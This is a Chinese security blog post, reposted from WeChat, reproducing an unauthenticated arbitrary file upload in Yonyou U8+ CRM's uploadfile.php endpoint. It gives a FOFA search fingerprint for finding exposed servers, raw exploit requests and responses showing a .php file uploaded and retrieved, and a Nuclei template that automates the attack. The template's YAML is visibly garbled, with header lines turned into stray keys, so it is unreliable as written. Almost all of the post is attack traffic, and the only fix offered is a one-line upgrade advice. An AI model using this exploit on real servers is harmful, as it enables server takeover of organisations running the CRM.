用友U8+CRM
用友CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服。该系统uploadfile.php接口存在任意文件上传漏洞,可能导致服务器失陷。
body="用友U8CRM"
第一步,向靶场发送如下数据包,上传文件
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream
wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"
upload
-----------------------------vvv3wdayqv3yppdxvn3w--
响应内容如下,其中url是回显文件路径
HTTP/1.1 200 OK
Connection: close
Content-Length: 165
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Tue, 21 May 2024 06:06:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.19 (Win32) PHP/5.2.17
Set-Cookie: PHPSESSID=qu1g0r0318klgvvhgs7h1dhcb0; path=/
X-Powered-By: PHP/5.2.17
{"success":true,"code":"","message":"","files":[{"vname":"file","fname":"%s.php ","url":"/tmpfile/updB3CB.tmp.php ","type":"application/octet-stream","size":10}]}
第二步,请求回显文件
http://x.x.x.x/tmpfile/updB3CB.tmp.php
响应数据包如下
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Tue, 21 May 2024 06:06:51 GMT
Server: Apache/2.2.19 (Win32) PHP/5.2.17
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
wersqqmlumloqa
漏洞复现成功
poc文件内容如下
id: yonyou-crm-uploadfile-uploadfile
info:
name: 用友CRM系统uploadfile.php接口存在任意文件上传漏洞
author: fgz
severity: critical
description: '用友CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服。该系统uploadfile.php接口存在任意文件上传漏洞,可能导致服务器失陷。'
tags: 2024,uploadfile
metadata:
1 :
body="用友U8CRM" :
verified: true
variables:
bodystr: "{{to_lower(rand_base(15))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
raw:
|-
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 :
Connection: close
358 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
gzip, deflate :
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
multipart/form-data; boundary=---------------------------{{boundary}} :
-----------------------------{{boundary}}
form-data; name="file"; filename="%s.php " :
application/octet-stream :
{{bodystr}}
-----------------------------{{boundary}}
form-data; name="upload" :
upload
-----------------------------{{boundary}}--
|
GET {{name}} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
extractors:
type: json
part: body
name: name
json:
'.files.[0].url'
internal: true
matchers:
type: dsl
dsl:
"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{bodystr}}')"
升级到最新版本。
原文始发于微信公众号(AI与网安):【2024HW】用友CRM系统uploadfile.php接口存在任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论